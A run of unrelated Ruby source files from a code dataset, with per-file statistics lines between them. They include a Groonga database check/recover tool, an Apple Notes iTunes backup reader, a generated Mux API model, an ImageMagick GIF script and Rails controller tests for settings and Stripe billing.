raise ArgumentError.new("#{self.class.name}#null must be a hash of conditions")
end
if !TYPES.include?(@type)
raise "#{self.class.name}#type must be one of #{TYPES.to_sentence} for #{@name}, you passed: #{@type}"
end
if @examples.empty?
if [email protected]?
@examples = @enum.keys
elsif [email protected]?
@examples = [@default]
end
end
if @examples.empty? && @options.empty? && !table?
raise "#{self.class.name}#examples is required if a #default is not specified for #{@name}"
end
if wildcard?
if [email protected]? { |example| example.is_a?(Hash) }
raise "#{self.class.name}#examples must be a hash with name/value keys when the name is \"*\""
end
end
end
def <=>(other_option)
name <=> other_option.name
end
def advanced?
if options.any?
options.any?(&:advanced?)
else
!simple?
end
end
def array?(inner_type)
type == "[#{inner_type}]"
end
def config_file_sort_token
first =
if table?
2
elsif required?
0
else
1
end
second =
case category
when "General"
"AA #{category}"
when "Requests"
"ZZ #{category}"
else
category
end
third =
case name
when "inputs"
"AAB #{name}"
when "strategy", "type"
"AAA #{name}"
else
name
end
[first, second, third]
end
def context?
category.downcase == "context"
end
def get_relevant_sections(sections)
sections.select do |section|
section.referenced_options.include?(name) ||
section.referenced_options.any? { |o| o.end_with?(name) }
end
end
def human_default
"#{default} #{unit}"
end
def inline?
display == "inline"
end
def optional?
!required?
end
def partition_key?
partition_key == true
end
def relevant_when_kvs
relevant_when.collect do |k, v|
if v.is_a?(Array)
v.collect do |sub_v|
"#{k} = #{sub_v.to_toml}"
end
else
"#{k} = #{v.to_toml}"
end
end.flatten
end
def required?
default.nil? && null == false
end
def simple?
if options.any?
@simple == true || (required? && simple_options.any?)
else
@simple == true || required?
end
end
def simple_options
@simple_options ||= options.select(&:simple?)
end
def table?
type == "table"
end
def templateable?
templateable == true
end
def wildcard?
name == "*"
end
end | 20.353535 | 108 | 0.572953 |
5d3946f2609f647ef4b70d0de902d1ea13d252ff | 366 | require 'celluloid'
require 'pry'
# Celluloid actor demonstrating file locking. Fixes: removed the space
# before the parameter list (Ruby warning), marked the unused second
# parameter, snake_cased the locals, and parameterized the previously
# hard-coded file path (default preserves the old behavior).
class File_Access
  include Celluloid

  # Ask +a_file+ (another actor or self) to take the lock. The second
  # argument was never used; it is kept to preserve the two-arg call sites.
  def open_file(a_file, _unused = nil)
    a_file.lock_file
  end

  # Open (creating if needed), exclusively flock, then close +path+.
  # Closing the file releases the lock.
  def lock_file(path = '/Users/dilum/Desktop/input.txt')
    @f1 = File.open(path, File::RDWR | File::CREAT, 0644)
    @f1.flock(File::LOCK_EX)
    @f1.close
  end
end
# Demo: two actors contending for the same file lock — one request goes
# through the actor mailbox asynchronously, the other runs synchronously.
a = File_Access.new
b = File_Access.new
# Fire-and-forget via Celluloid's async proxy...
a.async.open_file(a,b)
# ...then lock again from the calling thread.
a.open_file(b,a)
a.lock_file | 15.25 | 81 | 0.724044 |
edd16d588cd969ae35643fc59eb43eb4e1f491f7 | 13,589 | module Groonga
module CommandLine
class Grndb
# argv: the full command line; the first element is the grndb program
# path (used in help text), the rest are subcommand arguments.
def initialize(argv)
  @program_path, *@arguments = argv
  @succeeded = true
  @database_path = nil
end
# Parse the arguments; parsing dispatches to the registered subcommand
# actions (check/recover), which flip @succeeded on failure. Returns
# false on a command-line parse error, otherwise the success flag.
def run
  command_line_parser = create_command_line_parser
  options = nil
  begin
    # Side effect: runs the matched command's add_action block.
    options = command_line_parser.parse(@arguments)
  rescue Slop::Error => error
    $stderr.puts(error.message)
    $stderr.puts
    $stderr.puts(command_line_parser.help_message)
    return false
  end
  @succeeded
end
private
# Build the CLI with two subcommands, each taking a DB_PATH positional
# argument: "check" (optionally restricted to --target OBJECT) and
# "recover" (optionally truncating corrupted objects with --force-truncate).
def create_command_line_parser
  program_name = File.basename(@program_path)
  parser = CommandLineParser.new(program_name)

  parser.add_command("check") do |command|
    command.description = "Check database"

    options = command.options
    options.banner += " DB_PATH"
    options.string("--target", "Check only the target object.")

    command.add_action do |options|
      open_database(command, options) do |database, rest_arguments|
        check(database, options, rest_arguments)
      end
    end
  end

  parser.add_command("recover") do |command|
    command.description = "Recover database"

    options = command.options
    options.banner += " DB_PATH"
    options.boolean("--force-truncate", "Force to truncate corrupted objects.")

    command.add_action do |options|
      open_database(command, options) do |database, rest_arguments|
        recover(database, options, rest_arguments)
      end
    end
  end

  parser
end
# Open the database named by the first positional argument and yield it
# with the remaining arguments; the database is always closed afterwards.
# When the path is missing or the open fails, print diagnostics, mark the
# run as failed, and return without yielding.
def open_database(command, options)
  arguments = options.arguments
  if arguments.empty?
    $stderr.puts("Database path is missing")
    $stderr.puts
    $stderr.puts(command.help_message)
    # Fixed typo: this assigned @succeesed, so a missing database path
    # still let grndb exit with success.
    @succeeded = false
    return
  end

  database = nil
  @database_path, *rest_arguments = arguments
  begin
    database = Database.open(@database_path)
  rescue Error => error
    $stderr.puts("Failed to open database: <#{@database_path}>")
    $stderr.puts(error.message)
    @succeeded = false
    return
  end

  begin
    yield(database, rest_arguments)
  ensure
    database.close
  end
end
# Print each message to stderr and record that the run failed; the flag
# is reported by #run as the process result.
def failed(*messages)
  messages.each { |message| $stderr.puts(message) }
  @succeeded = false
end
# Action for the "recover" subcommand: delegate to a Recoverer configured
# from the CLI options; a recovery Error marks the run as failed.
def recover(database, options, arguments)
  recoverer = Recoverer.new
  recoverer.database = database
  recoverer.force_truncate = options[:force_truncate]
  begin
    recoverer.recover
  rescue Error => error
    failed("Failed to recover database: <#{@database_path}>",
           error.message)
  end
end
# Action for the "check" subcommand: wire a Checker to this runner's
# failure reporting, verify database-level health, then check either the
# single --target object or every object in the database.
def check(database, options, arguments)
  checker = Checker.new
  checker.program_path = @program_path
  checker.database_path = @database_path
  checker.database = database
  checker.on_failure = lambda do |message|
    failed(message)
  end

  checker.check_database
  target_name = options[:target]
  if target_name
    checker.check_one(target_name)
  else
    checker.check_all
  end
end
# Walks database objects looking for lock/corruption problems and reports
# each via the injected on_failure callback. Fix: check_object_recursive's
# IndexColumn branch called `Record.new(database, ...)` but this class only
# defines `attr_writer :database` (no reader), so reporting an unopenable
# index source raised NoMethodError; it now uses @database like every
# other branch.
class Checker
  attr_writer :program_path
  attr_writer :database_path
  attr_writer :database
  attr_writer :on_failure

  def initialize
    @context = Context.instance
    # Object IDs already visited, so shared objects are checked once.
    @checked = {}
  end

  # Database-level health checks (orphan objects, lock, corruption, dirty
  # shutdown).
  def check_database
    check_database_orphan_inspect
    check_database_locked
    check_database_corrupt
    check_database_dirty
  end

  # Check a single named object and everything it depends on. Reports
  # whether the name is unopenable (present but broken) or absent.
  def check_one(target_name)
    target = @context[target_name]
    if target.nil?
      exist_p = open_database_cursor do |cursor|
        cursor.any? do
          cursor.key == target_name
        end
      end
      if exist_p
        failed_to_open(target_name)
      else
        message = "[#{target_name}] Not exist."
        failed(message)
      end
      return
    end

    check_object_recursive(target)
  end

  # Check every non-builtin object: first report names that cannot be
  # opened at all, then inspect each openable object.
  def check_all
    open_database_cursor do |cursor|
      cursor.each do |id|
        next if ID.builtin?(id)
        next if builtin_object_name?(cursor.key)
        next if @context[id]

        failed_to_open(cursor.key)
      end
    end

    @database.each do |object|
      check_object(object)
    end
  end

  private
  # A leftover "inspect" record with no backing object indicates a known
  # historical bug; suggest `grndb recover` to remove it.
  def check_database_orphan_inspect
    open_database_cursor do |cursor|
      cursor.each do |id|
        if cursor.key == "inspect" && @context[id].nil?
          message =
            "Database has orphan 'inspect' object. " +
            "Remove it by '#{@program_path} recover #{@database_path}'."
          failed(message)
          break
        end
      end
    end
  end

  def check_database_locked
    return unless @database.locked?

    message =
      "Database is locked. " +
      "It may be broken. " +
      "Re-create the database."
    failed(message)
  end

  def check_database_corrupt
    return unless @database.corrupt?

    message =
      "Database is corrupt. " +
      "Re-create the database."
    failed(message)
  end

  # A dirty flag alone is not conclusive: if any database/object file was
  # modified after the recorded last-modified time, the flag may simply
  # not have been flushed yet, so no failure is reported.
  def check_database_dirty
    return unless @database.dirty?

    last_modified = @database.last_modified
    if File.stat(@database.path).mtime > last_modified
      return
    end

    open_database_cursor do |cursor|
      cursor.each do |id|
        next if ID.builtin?(id)

        path = "%s.%07x" % [@database.path, id]
        next unless File.exist?(path)
        return if File.stat(path).mtime > last_modified
      end
    end

    message =
      "Database wasn't closed successfully. " +
      "It may be broken. " +
      "Re-create the database."
    failed(message)
  end

  # Check one object's lock and corruption state, at most once per ID.
  def check_object(object)
    return if @checked.key?(object.id)

    @checked[object.id] = true

    check_object_locked(object)
    check_object_corrupt(object)
  end

  # Report a stale lock with a remedy tailored to the object kind.
  def check_object_locked(object)
    case object
    when IndexColumn
      return unless object.locked?
      message =
        "[#{object.name}] Index column is locked. " +
        "It may be broken. " +
        "Re-create index by '#{@program_path} recover #{@database_path}'."
      failed(message)
    when Column
      return unless object.locked?
      name = object.name
      message =
        "[#{name}] Data column is locked. " +
        "It may be broken. " +
        "(1) Truncate the column (truncate #{name}) or " +
        "clear lock of the column (lock_clear #{name}) " +
        "and (2) load data again."
      failed(message)
    when Table
      return unless object.locked?
      name = object.name
      message =
        "[#{name}] Table is locked. " +
        "It may be broken. " +
        "(1) Truncate the table (truncate #{name}) or " +
        "clear lock of the table (lock_clear #{name}) " +
        "and (2) load data again."
      failed(message)
    end
  end

  # Report corruption with a remedy tailored to the object kind.
  def check_object_corrupt(object)
    case object
    when IndexColumn
      return unless object.corrupt?
      message =
        "[#{object.name}] Index column is corrupt. " +
        "Re-create index by '#{@program_path} recover #{@database_path}'."
      failed(message)
    when Column
      return unless object.corrupt?
      name = object.name
      message =
        "[#{name}] Data column is corrupt. " +
        "(1) Truncate the column (truncate #{name} or " +
        "'#{@program_path} recover --force-truncate #{@database_path}') " +
        "and (2) load data again."
      failed(message)
    when Table
      return unless object.corrupt?
      name = object.name
      message =
        "[#{name}] Table is corrupt. " +
        "(1) Truncate the table (truncate #{name} or " +
        "'#{@program_path} recover --force-truncate #{@database_path}') " +
        "and (2) load data again."
      failed(message)
    end
  end

  # Check an object plus its dependency graph: a table's domain and
  # columns, a data column's range and index lexicons, an index column's
  # range and sources. Unresolvable IDs are reported by key.
  def check_object_recursive(target)
    return if @checked.key?(target.id)

    check_object(target)
    case target
    when Table
      unless target.is_a?(Groonga::Array)
        domain_id = target.domain_id
        domain = @context[domain_id]
        if domain.nil?
          record = Record.new(@database, domain_id)
          failed_to_open(record.key)
        elsif domain.is_a?(Table)
          check_object_recursive(domain)
        end
      end

      target.column_ids.each do |column_id|
        column = @context[column_id]
        if column.nil?
          record = Record.new(@database, column_id)
          failed_to_open(record.key)
        else
          check_object_recursive(column)
        end
      end
    when FixedSizeColumn, VariableSizeColumn
      range_id = target.range_id
      range = @context[range_id]
      if range.nil?
        record = Record.new(@database, range_id)
        failed_to_open(record.key)
      elsif range.is_a?(Table)
        check_object_recursive(range)
      end

      lexicon_ids = []
      target.indexes.each do |index_info|
        index = index_info.index
        lexicon_ids << index.domain_id
        check_object(index)
      end
      lexicon_ids.uniq.each do |lexicon_id|
        lexicon = @context[lexicon_id]
        if lexicon.nil?
          record = Record.new(@database, lexicon_id)
          failed_to_open(record.key)
        else
          check_object(lexicon)
        end
      end
    when IndexColumn
      range_id = target.range_id
      range = @context[range_id]
      if range.nil?
        record = Record.new(@database, range_id)
        failed_to_open(record.key)
        return
      end
      check_object(range)

      target.source_ids.each do |source_id|
        source = @context[source_id]
        if source.nil?
          # Fixed: was `Record.new(database, ...)` — no such reader exists.
          record = Record.new(@database, source_id)
          failed_to_open(record.key)
        elsif source.is_a?(Column)
          check_object_recursive(source)
        end
      end
    end
  end

  # Iterate raw database records in ascending ID order.
  def open_database_cursor(&block)
    flags =
      TableCursorFlags::ASCENDING |
      TableCursorFlags::BY_ID
    TableCursor.open(@database, :flags => flags, &block)
  end

  def builtin_object_name?(name)
    case name
    when "inspect"
      # Just for compatibility. It's needed for users who used
      # Groonga master at between 2016-02-03 and 2016-02-26.
      true
    else
      false
    end
  end

  def failed(message)
    @on_failure.call(message)
  end

  def failed_to_open(name)
    message =
      "[#{name}] Can't open object. " +
      "It's broken. " +
      "Re-create the object or the database."
    failed(message)
  end
end
# Runs database recovery, optionally truncating corrupted objects (and
# deleting their sidecar files) first so recovery can proceed.
class Recoverer
  attr_writer :database
  attr_writer :force_truncate

  def initialize
    @context = Context.instance
  end

  # Truncate corrupted objects when forced, then run the engine recovery.
  def recover
    if @force_truncate
      truncate_corrupt_objects
    end
    @database.recover
  end

  # For every corrupted object: truncate it, then remove any files named
  # "<object path>.<suffix>" from the object's directory, logging each
  # removal (or removal failure) to stdout/stderr and the Groonga log.
  def truncate_corrupt_objects
    @database.each do |object|
      next unless object.corrupt?
      logger = @context.logger
      object_path = object.path
      object_dirname = File.dirname(object_path)
      object_basename = File.basename(object_path)
      object.truncate
      Dir.foreach(object_dirname) do |path|
        if path.start_with?("#{object_basename}.")
          begin
            File.unlink("#{object_dirname}/#{path}")
            message = "Corrupted <#{object_path}> related file is removed: <#{path}>"
            $stdout.puts(message)
            logger.log(Logger::Level::INFO.to_i, __FILE__, __LINE__, "truncate_corrupt_objects", message)
          rescue Error => error
            # NOTE(review): `error` is unused; only a generic message is
            # logged — consider including error.message.
            message = "Failed to remove file which is related to corrupted <#{object_path}>: <#{path}>"
            $stderr.puts(message)
            logger.log_error(message)
          end
        end
      end
    end
  end
end
end
end
end
| 29.997792 | 111 | 0.525204 |
ab5bc90030036b613863148372eebcb0d11e81a1 | 3,007 | require 'fileutils'
require 'pathname'
require_relative 'AppleBackup.rb'
require_relative 'AppleNote.rb'
require_relative 'AppleNoteStore.rb'
##
# This class represents an Apple backup created by iTunes (i.e. hashed files with a Manifest.db).
# This class will abstract away figuring out how to get the right media files to embed back into an AppleNote.
##
# This class represents an Apple backup created by iTunes (i.e. hashed files with a Manifest.db).
# This class will abstract away figuring out how to get the right media files to embed back into an AppleNote.
class AppleBackupHashed < AppleBackup

  ##
  # Creates a new AppleBackupHashed. Expects a Pathname +root_folder+ that represents the root
  # of the backup and a Pathname +output_folder+ which will hold the results of this run.
  # Immediately sets the NoteStore database file to be the appropriate hashed file.
  def initialize(root_folder, output_folder)
    super(root_folder, AppleBackup::HASHED_BACKUP_TYPE, output_folder)
    @hashed_backup_manifest_database = nil

    # Check to make sure we're all good
    if self.valid?
      puts "Created a new AppleBackup from iTunes backup: #{@root_folder}"

      # Copy the modern NoteStore to our output directory.
      # The fixed hex names below are iTunes' SHA-1 hashes of the well-known
      # relative paths of the modern and legacy NoteStore databases.
      FileUtils.cp(@root_folder + "4f" + "4f98687d8ab0d6d1a371110e6b7300f6e465bef2", @note_store_modern_location)
      modern_note_version = AppleNoteStore.guess_ios_version(@note_store_modern_location)

      # Copy the legacy NoteStore to our output directory
      FileUtils.cp(@root_folder + "ca" + "ca3bc056d4da0bbf88b5fb3be254f3b7147e639c", @note_store_legacy_location)
      legacy_note_version = AppleNoteStore.guess_ios_version(@note_store_legacy_location)

      # Copy the Manifest.db to our output directory in case we want to look up files
      FileUtils.cp(@root_folder + "Manifest.db", @output_folder + "Manifest.db")

      # Create the AppleNoteStore objects
      @note_stores.push(AppleNoteStore.new(@note_store_modern_location, self, modern_note_version))
      @note_stores.push(AppleNoteStore.new(@note_store_legacy_location, self, legacy_note_version))

      @hashed_backup_manifest_database = SQLite3::Database.new((@output_folder + "Manifest.db").to_s, {results_as_hash: true})
    end
  end

  ##
  # This method returns true if it is a valid backup of the specified type. For a HASHED_BACKUP_TYPE,
  # that means it has a Manifest.db at the root level.
  def valid?
    @root_folder.directory? and (@root_folder + "Manifest.db").file?
  end

  ##
  # This method returns a Pathname that represents the location on this disk of the requested file or nil.
  # It expects a String +filename+ to look up. For hashed backups, that involves checking Manifest.db
  # to get the appropriate hash value.
  def get_real_file_path(filename)
    @hashed_backup_manifest_database.execute("SELECT fileID FROM Files WHERE relativePath=?", filename) do |row|
      hashed_name = row["fileID"]
      # Backup files live in a subfolder named after the first two hex chars.
      hashed_folder = hashed_name[0, 2]
      return @root_folder + hashed_folder + hashed_name
    end
    # BUGFIX: return nil explicitly when no Manifest.db row matched; the
    # previous code relied on the undocumented return value of the block
    # form of SQLite3::Database#execute.
    nil
  end
end
| 43.57971 | 128 | 0.736282 |
01ebbb76c06a2f2031db7005124ae811b84e3695 | 7,192 | =begin
#Mux API
#Mux is how developers build online video. This API encompasses both Mux Video and Mux Data functionality to help you build your video-related projects better and faster than ever before.
The version of the OpenAPI document: v1
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.0.1
=end
require 'date'
require 'time'
module MuxRuby
# Response payload for the Mux "list incidents" endpoint: a page of
# Incident records plus paging metadata (total row count, timeframe).
# NOTE: auto-generated by OpenAPI Generator -- regenerate from the API
# spec rather than hand-editing.
class ListIncidentsResponse
  # [Array<Incident>] one page of incident records
  attr_accessor :data

  # [Integer] total number of rows matching the query (across all pages)
  attr_accessor :total_row_count

  # [Array<Integer>] queried time window -- presumably [start, end] epoch
  # seconds; confirm against the Mux API reference.
  attr_accessor :timeframe

  # Attribute mapping from ruby-style variable name to JSON key.
  def self.attribute_map
    {
      :'data' => :'data',
      :'total_row_count' => :'total_row_count',
      :'timeframe' => :'timeframe'
    }
  end

  # Returns all the JSON keys this model knows about
  def self.acceptable_attributes
    attribute_map.values
  end

  # Attribute type mapping.
  def self.openapi_types
    {
      :'data' => :'Array<Incident>',
      :'total_row_count' => :'Integer',
      :'timeframe' => :'Array<Integer>'
    }
  end

  # List of attributes with nullable: true (none for this schema)
  def self.openapi_nullable
    Set.new([
    ])
  end

  # Initializes the object
  # @param [Hash] attributes Model attributes in the form of hash
  # @raise [ArgumentError] if +attributes+ is not a Hash or contains keys
  #   outside of {attribute_map}
  def initialize(attributes = {})
    if (!attributes.is_a?(Hash))
      fail ArgumentError, "The input argument (attributes) must be a hash in `MuxRuby::ListIncidentsResponse` initialize method"
    end

    # check to see if the attribute exists and convert string to symbol for hash key
    attributes = attributes.each_with_object({}) { |(k, v), h|
      if (!self.class.attribute_map.key?(k.to_sym))
        fail ArgumentError, "`#{k}` is not a valid attribute in `MuxRuby::ListIncidentsResponse`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
      end
      h[k.to_sym] = v
    }

    if attributes.key?(:'data')
      if (value = attributes[:'data']).is_a?(Array)
        self.data = value
      end
    end

    if attributes.key?(:'total_row_count')
      self.total_row_count = attributes[:'total_row_count']
    end

    if attributes.key?(:'timeframe')
      if (value = attributes[:'timeframe']).is_a?(Array)
        self.timeframe = value
      end
    end
  end

  # Show invalid properties with the reasons. Usually used together with valid?
  # @return Array for valid properties with the reasons
  def list_invalid_properties
    invalid_properties = Array.new
    invalid_properties
  end

  # Check to see if the all the properties in the model are valid
  # @return true if the model is valid (always true: this schema declares
  #   no constraints)
  def valid?
    true
  end

  # Checks equality by comparing each attribute.
  # @param [Object] Object to be compared
  def ==(o)
    return true if self.equal?(o)
    self.class == o.class &&
        data == o.data &&
        total_row_count == o.total_row_count &&
        timeframe == o.timeframe
  end

  # @see the `==` method
  # @param [Object] Object to be compared
  def eql?(o)
    self == o
  end

  # Calculates hash code according to all attributes.
  # @return [Integer] Hash code
  def hash
    [data, total_row_count, timeframe].hash
  end

  # Builds the object from hash
  # @param [Hash] attributes Model attributes in the form of hash
  # @return [Object] Returns the model itself
  def self.build_from_hash(attributes)
    new.build_from_hash(attributes)
  end

  # Builds the object from hash
  # @param [Hash] attributes Model attributes in the form of hash
  # @return [Object] Returns the model itself
  def build_from_hash(attributes)
    return nil unless attributes.is_a?(Hash)
    self.class.openapi_types.each_pair do |key, type|
      if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
        self.send("#{key}=", nil)
      elsif type =~ /\AArray<(.*)>/i
        # check to ensure the input is an array given that the attribute
        # is documented as an array but the input is not
        if attributes[self.class.attribute_map[key]].is_a?(Array)
          self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
        end
      elsif !attributes[self.class.attribute_map[key]].nil?
        self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
      end
    end

    self
  end

  # Deserializes the data based on type
  # @param string type Data type
  # @param string value Value to be deserialized
  # @return [Object] Deserialized data
  def _deserialize(type, value)
    case type.to_sym
    when :Time
      Time.parse(value)
    when :Date
      Date.parse(value)
    when :String
      value.to_s
    when :Integer
      value.to_i
    when :Float
      value.to_f
    when :Boolean
      if value.to_s =~ /\A(true|t|yes|y|1)\z/i
        true
      else
        false
      end
    when :Object
      # generic object (usually a Hash), return directly
      value
    when /\AArray<(?<inner_type>.+)>\z/
      inner_type = Regexp.last_match[:inner_type]
      value.map { |v| _deserialize(inner_type, v) }
    when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
      k_type = Regexp.last_match[:k_type]
      v_type = Regexp.last_match[:v_type]
      {}.tap do |hash|
        value.each do |k, v|
          hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
        end
      end
    else # model
      # models (e.g. Pet) or oneOf
      klass = MuxRuby.const_get(type)
      klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
    end
  end

  # Returns the string representation of the object
  # @return [String] String presentation of the object
  def to_s
    to_hash.to_s
  end

  # to_body is an alias to to_hash (backward compatibility)
  # @return [Hash] Returns the object in the form of hash
  def to_body
    to_hash
  end

  # Returns the object in the form of hash
  # @return [Hash] Returns the object in the form of hash
  def to_hash
    hash = {}
    self.class.attribute_map.each_pair do |attr, param|
      value = self.send(attr)
      if value.nil?
        # skip nil values unless the attribute is declared nullable AND the
        # instance variable was explicitly set
        is_nullable = self.class.openapi_nullable.include?(attr)
        next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
      end

      hash[param] = _to_hash(value)
    end
    hash
  end

  # Outputs non-array value in the form of hash
  # For object, use to_hash. Otherwise, just return the value
  # @param [Object] value Any valid value
  # @return [Hash] Returns the value in the form of hash
  def _to_hash(value)
    if value.is_a?(Array)
      value.compact.map { |v| _to_hash(v) }
    elsif value.is_a?(Hash)
      {}.tap do |hash|
        value.each { |k, v| hash[k] = _to_hash(v) }
      end
    elsif value.respond_to? :to_hash
      value.to_hash
    else
      value
    end
  end
end
end
| 29.842324 | 208 | 0.622219 |
bfecc38f7e4fac1ccd41902a34b3672ceabb1723 | 919 | require 'test_helper'
# Functional tests for CalendarController's token-authenticated ICS feed.
class CalendarControllerTest < ActionController::TestCase
  setup do
    @trip = trips(:trip_one)
    @user = users(:user_one)
  end

  test "should get ics" do
    # Route must capture the email/token wildcards and the .ics format.
    assert_recognizes({controller: 'calendar', action: 'ics', "user_email" => "*user_email", "user_token" => "*user_token", "format" => "ics"}, '/calendar/*user_email/*user_token.ics')
    get :ics, "user_email" => @user.email, "user_token" => @user.authentication_token, "format" => "ics"
    assert_response :success
    assert_equal "text/calendar", response.headers['Content-Type']
  end

  test "should get html" do
    assert_recognizes({controller: 'calendar', action: 'ics', "user_email" => "*user_email", "user_token" => "*user_token", "format" => "html"}, '/calendar/*user_email/*user_token.html')
    get :ics, "user_email" => @user.email, "user_token" => @user.authentication_token, "format" => "html"
    assert_response :success
  end
end
| 41.772727 | 186 | 0.68988 |
1c51afba9c0a5a88096feb554ca63bcdeaad5fdf | 464 | cask :v1 => 'google-earth' do
version :latest
sha256 :no_check
url 'https://dl.google.com/earth/client/advanced/current/GoogleEarthMac-Intel.dmg'
homepage 'https://www.google.com/earth/'
license :unknown
app 'Google Earth.app'
zap :delete => [
'~/Library/Application Support/Google Earth',
'~/Library/Caches/Google Earth',
'~/Library/Caches/com.Google.GoogleEarthPlus',
]
end
| 27.294118 | 84 | 0.609914 |
ab8daa0579f6e1c697215defaed0e20850aca0a0 | 1,282 | #!/usr/bin/ruby
gem 'json'
require 'json'
require 'fileutils'
$tmp = "tmp"
if ARGV.size < 1
puts "Pass the gifspec!"
Process.exit
end
if !File.exist?(ARGV[0])
puts "File '#{ARGV[0]}' does not exist!"
Process.exit
end
# Load and parse gifspec
spec = nil
File.open(ARGV[0], "r") { |f|
spec = JSON.parse(f.read)
}
if spec.nil? || spec.empty?
puts "No JSON in '#{ARGV[0]}'!"
Process.exit
end
# Assemble image preprocessing parameters
# wxh{+-}x{+-}y
crop=""
if !spec["crop"].nil?
crop = spec["crop"]["width"].to_s + "x" +
spec["crop"]["height"].to_s +
"+" + spec["crop"]["x"].to_s +
"+" + spec["crop"]["y"].to_s
crop = "-crop #{crop}"
end
# wxh
resize = spec["size"]["width"].to_s + "x" +
spec["size"]["height"].to_s
# Preprocess images
FileUtils::mkdir_p("tmp")
spec["sequence"].map { |e|
e["file"]
}.each { |file|
`convert "#{file}" #{crop} -resize "#{resize}" "#{$tmp}/#{file}"`
}
# Assemble image sequence
sequence = spec["sequence"].map { |e|
Array.new(e["repeat"], e["file"])
}.flatten.map { |f|
"\"#{$tmp}/#{f}\""
}.join(" ")
# Create GIF
`convert -delay #{spec["delay"]}x100 #{sequence} -loop #{spec["loop"]} "#{ARGV[0].sub(/\.[^.]+$/, ".gif")}"`
FileUtils::rm_rf($tmp)
| 18.57971 | 108 | 0.549142 |
accf540eca58aaa9116d02778ac0c0f6e11dddf4 | 6,557 | require "test_helper"
include CarrierWaveDirect::Test::Helpers
# Functional tests for SettingsController: page rendering, Stripe-backed
# billing (via StripeMock), bulk preference updates, and small per-setting
# POST endpoints (font, theme, now-playing, audio panel).
class SettingsControllerTest < ActionController::TestCase
  setup do
    @user = users(:ben)
  end

  test "should get settings" do
    login_as @user
    get :settings
    assert_response :success
  end

  test "should get account" do
    login_as @user
    get :account
    assert_response :success
  end

  test "should get account @last_payment" do
    StripeMock.start
    event = StripeMock.mock_webhook_event("charge.succeeded", {customer: @user.customer_id})
    BillingEvent.create(info: event.as_json)
    login_as @user
    get :account
    assert_response :success
    assert assigns(:last_payment).present?, "@last_payment should exist"
    StripeMock.stop
  end

  test "should not get account @last_payment because it is too old" do
    StripeMock.start
    event = StripeMock.mock_webhook_event("charge.succeeded", {customer: @user.customer_id})
    # Backdate the event past the recency window so the controller ignores it.
    BillingEvent.create(info: event.as_json).update(created_at: 8.days.ago)
    login_as @user
    get :account
    assert_response :success
    assert_nil assigns(:last_payment)
    StripeMock.stop
  end

  test "should get appearance" do
    login_as @user
    get :appearance
    assert_response :success
  end

  test "should get billing" do
    StripeMock.start
    events = [
      StripeMock.mock_webhook_event("charge.succeeded", {customer: @user.customer_id}),
      StripeMock.mock_webhook_event("invoice.payment_succeeded", {customer: @user.customer_id}),
    ]
    events.each do |event|
      BillingEvent.create(info: event.as_json)
    end
    login_as @user
    get :billing
    assert_response :success
    assert_not_nil assigns(:next_payment_date)
    assert assigns(:billing_events).present?
    StripeMock.stop
  end

  test "should get import_export" do
    login_as @user
    get :import_export
    assert_response :success
  end

  test "should import" do
    login_as @user
    # Skipped: the assertions below never run until this is resolved.
    skip "Figure out how to test CarrierWave direct"
    get :import_export, params: {key: sample_key(ImportUploader.new, base: "test.opml")}
    assert_redirected_to settings_import_export_url
  end

  test "should update plan" do
    StripeMock.start
    stripe_helper = StripeMock.create_test_helper
    plans = {
      original: plans(:basic_monthly_3),
      new: plans(:basic_yearly_3),
    }
    plans.each do |_, plan|
      create_stripe_plan(plan)
    end
    customer = Stripe::Customer.create({email: @user.email, plan: plans[:original].stripe_id, source: stripe_helper.generate_card_token})
    @user.update(customer_id: customer.id)
    # NOTE(review): `.inspect` result is discarded; this line only forces a
    # reload -- likely leftover debugging.
    @user.reload.inspect
    login_as @user
    post :update_plan, params: {plan: plans[:new].id}
    assert_equal plans[:new], @user.reload.plan
    StripeMock.stop
  end

  test "should update credit card" do
    StripeMock.start
    plan = plans(:trial)
    last4 = "1234"
    card_1 = StripeMock.generate_card_token(last4: "4242", exp_month: 99, exp_year: 3005)
    card_2 = StripeMock.generate_card_token(last4: last4, exp_month: 99, exp_year: 3005)
    create_stripe_plan(plan)
    user = User.create(
      email: "[email protected]",
      password: default_password,
      plan: plan,
    )
    user.stripe_token = card_1
    user.save
    login_as user
    post :update_credit_card, params: {stripe_token: card_2}
    assert_redirected_to settings_billing_url
    # The new card must now be the customer's default source in Stripe.
    customer = Stripe::Customer.retrieve(user.customer_id)
    assert_equal last4, customer.sources.data.first.last4
    StripeMock.stop
  end

  test "should update settings" do
    login_as @user
    # Build {"setting_name" => "1"} for every boolean-ish preference key.
    settings = [
      :entry_sort, :starred_feed_enabled, :precache_images,
      :show_unread_count, :sticky_view_inline, :mark_as_read_confirmation,
      :apple_push_notification_device_token, :receipt_info, :entries_display,
      :entries_feed, :entries_time, :entries_body, :ui_typeface, :theme,
      :hide_recently_read, :hide_updated, :disable_image_proxy, :entries_image,
    ].each_with_object({}) { |setting, hash| hash[setting.to_s] = "1" }
    patch :settings_update, params: {id: @user, user: settings}
    assert_redirected_to settings_url
    assert_equal settings, @user.reload.settings
  end

  test "should update view settings" do
    login_as @user
    tag = @user.feeds.first.tag("tag", @user).first.tag
    params = {
      id: @user,
      tag_visibility: true,
      tag: tag.id,
      column_widths: true,
      column: "test",
      width: 1234,
    }
    patch :view_settings_update, params: params
    assert_equal({tag.id.to_s => true}, @user.reload.tag_visibility)
    assert_response :success
    # Column widths are persisted in the session, not on the user record.
    assert_equal session[:column_widths], {params[:column] => params[:width].to_s}
  end

  test "should increase font" do
    @user.font_size = 7
    @user.save
    login_as @user
    post :font_increase
    assert_response :success
    assert_equal (@user.font_size.to_i + 1).to_s, @user.reload.font_size
  end

  test "should decrease font" do
    @user.font_size = 7
    @user.save
    login_as @user
    post :font_decrease
    assert_response :success
    assert_equal (@user.font_size.to_i - 1).to_s, @user.reload.font_size
  end

  test "should change font" do
    login_as @user
    post :font, params: {font: Feedbin::Application.config.fonts.values.last}
    assert_equal @user.reload.font, Feedbin::Application.config.fonts.values.last
  end

